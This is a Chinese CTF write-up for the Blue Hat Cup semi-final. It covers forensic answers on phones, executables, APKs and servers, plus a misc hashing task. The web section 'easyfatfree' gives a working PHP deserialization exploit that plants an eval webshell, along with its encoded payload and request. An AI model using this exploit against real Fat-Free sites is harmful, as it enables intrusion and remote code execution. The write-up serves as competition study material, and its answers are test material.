当前位置:网站首页>蓝帽杯半决赛火炬木wp
蓝帽杯半决赛火炬木wp
2022-08-10 14:23:00 【vlan103】
蓝帽杯半决赛火炬木wp
Forensic
手机取证_1
iBoot-7429.62.1
手机取证_2
utf时间+8小时,最终为2022-01-11 18:47:38
exe分析_1
使用盘古石手机取证取iphone的zip,找到了关键的压缩包
密码在翻找聊天记录的时候发现为virus
之后将文件解压出之后拖入微步云沙箱查看https://s.threatbook.com/。
答案:C:\Program Files\Common Files\Services\WmiApSvr.exe
exe分析_2
导入微步云沙箱,找到了目标dll
答案:是
exe分析_3
答案:svchost.exe
exe分析_4
跟据聊天记录可得,这些软件作用是挖矿
答案:挖矿
exe分析_5
ip为220.86.87.232
答案:韩国
apk分析_1
从data.vmdk文件中找到exec文件
修改文件后缀名为zip,找到CERT.RSA,使用工具keytool获得序列号
keytool -printcert -file CERT.RSA
flag:0x936eacbe07f201df
apk分析_2
jadx打开,找到入口,解密就是服务器地址
flag:ansjk.ecxeio.xyz
apk分析_3
查找调用服务器函数的用例即可
flag:loadUrl
apk分析_4
从xml里面寻找,根据提示,结尾是cn,搜索cn即可找到
apk分析_5
存在安全检测行为
apk分析_6
flag:d.a.a.c.a.a()
apk分析_8
在受害人\手机\安卓\受害人手机\sdcard.vmdk\1.img\0\BigAnt5\Attachment\找到红星app
将红星.IPA后缀名改为zip打开,然后查看info.plist,搜索键名CFBundleIdentifier
com.dd666.hongxin
apk分析_9
同8,搜索APIKEY
d395159c291c627c9d4ff9139bf8f0a700b98732
apk分析_10
同8,在info.plist里面找,四个权限全都有,所以全选
apk分析_11
夜神模拟器直接打开,发现访问失败
答案:www.nansjy.com.cn:8161
apk分析_12
执行adb shell dumpsys activity recents | find “intent={”,得到程序入口:com.example.weisitas526sad.activity.SplashActivity
apk分析_15
用fiddler打开流量包,翻到了登录的流量包,找到了username为17317289056,密码的md5值为7f07965ec20841305f9e53a7a89584f4,网站解密https://www.somd5.com/
得到密码为b12345678b
答案:17317289056/b12345678b
服务器取证_6
通过查看系统文件找到网站所在路径
/www/wwwroot/v9.licai.com/public
服务器取证_7
在/www/wwwlogs目录下发现y9.licai.com.log
导出,打开,因为文件过大所以选择使用emeditor打开,第一条
183.160.76.194
misc
神秘的日志
注意题目的关键字是ntlm,在system中找到了来源为LSA,其中提到了ntlm身份验证。
试了下当前时间,发现错误,要找另一个security中的时间。相同的时间里试了几个时间试出来了。
import hashlib
data = ‘2022-04-17T03:27:06.7108313Z’
print(‘flag{’ + hashlib.md5(data.encode()).hexdigest() + ‘}’)
#flag{dafd0428f634aefd1ddb26f8257c791f}
答案:flag{dafd0428f634aefd1ddb26f8257c791f}
web
easyfatfree
类似于2020 ciscn初赛的https://www.cnblogs.com/yunen/p/13561370.html#babyunserialize修改一下exp即可
<?php
namespace DB;
class Jig {
const
FORMAT_JSON=0,
FORMAT_Serialized=1;
protected
//! Storage location
$dir = './lib/',
//! Current storage format
$format = self::FORMAT_JSON,
//! Jig log
$data = ["shell.php"=>['<?php eval($_POST[a]); ?>']],
//! lazy load/save files
$lazy = 1;
}
$jig = new Jig();
echo urlencode(serialize($jig));
运行生成payload
O%3A6%3A%22DB%5CJig%22%3A4%3A%7Bs%3A6%3A%22%00%2A%00dir%22%3Bs%3A6%3A%22.%2Flib%2F%22%3Bs%3A9%3A%22%00%2A%00format%22%3Bi%3A0%3Bs%3A7%3A%22%00%2A%00data%22%3Ba%3A1%3A%7Bs%3A9%3A%22shell.php%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A25%3A%22%3C%3Fphp+eval%28%24_POST%5Ba%5D%29%3B+%3F%3E%22%3B%7D%7Ds%3A7%3A%22%00%2A%00lazy%22%3Bi%3A1%3B%7D
使用GET传参,即传马成功
http://eci-2ze10x6989pjew6ypvv7.cloudeci1.ichunqiu.com/?payload=O%3A6%3A%22DB%5CJig%22%3A4%3A%7Bs%3A6%3A%22%00%2A%00dir%22%3Bs%3A6%3A%22.%2Flib%2F%22%3Bs%3A9%3A%22%00%2A%00format%22%3Bi%3A0%3Bs%3A7%3A%22%00%2A%00data%22%3Ba%3A1%3A%7Bs%3A9%3A%22shell.php%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A25%3A%22%3C%3Fphp+eval%28%24_POST%5Ba%5D%29%3B+%3F%3E%22%3B%7D%7Ds%3A7%3A%22%00%2A%00lazy%22%3Bi%3A1%3B%7D
在根目录获取flag
边栏推荐
- 1W字详解线程本地存储 ThreadLocal
- 从洞察到决策,一文解读标签画像体系建设方法论
- 数据产品经理那点事儿 二
- Makefile missing separator. Stop.怎么解决「建议收藏」
- 关于已拦截跨源请求CORS 头缺少 ‘Access-Control-Allow-Origin‘问题解决
- List集合
- Do not access Object.prototype method ‘hasOwnProperty‘ from target object....
- 舵机内部结及工作原理浅析[通俗易懂]
- data product manager
- 正则表达式(包含各种括号,echo,正则三剑客以及各种正则工具)
猜你喜欢
2022年网络安全培训火了,缺口达95%,揭开网络安全岗位神秘面纱
SQL学习(基础)
Error: Rule can only have one resource source (provided resource and test + include + exclude)
DB2查询2个时间段之间的所有月份,DB2查询2个时间段之间的所有日期
字节终面:CPU 是如何读写内存的?
物资采购小程序开发制作功能介绍
[JS Advanced] Creating sub-objects and replacing this_10 in ES5 standard specification
日志@Slf4j介绍使用及配置等级
统信 UOS V20 专业版(1050update2)发布:文件共享、全局搜索等优化
How does IT Xiaobai learn PHP systematically
随机推荐
Epoll learn to think: a high performance server processing framework
laravel throws the error to Dingding
安装mysql报错处理
PHP 判断文件是否有内容,没有内容则复制另一个文件写入
注意力模型---Attention Model
【有限元分析】异型密封圈计算泄漏量与参数化优化过程(带分析源文件)
【POI 2008, BLO】割点
学习MySQL 临时表
2012年下半年 系统架构设计师 下午试卷 II
一汽奥迪:持续34年聚焦品质与体验 立足市场需求推进产品迭代
leetcode 739. Daily Temperatures 每日温度(中等)
使用决策树对鸢尾花进行分类
【219】慕课三千多的那个go工程师的培训课笔记 02 go语言的编程思想
系统架构系列文章三--解决传统企业核心系统的性能问题
SQL学习(基础)
池化技术有多牛?来,告诉你阿里的Druid为啥如此牛逼!
MQTT服务器搭建
发送post请求前台无法获取数据
如何完成新媒体产品策划?
leetcode 739. Daily Temperatures Daily Temperatures (Moderate)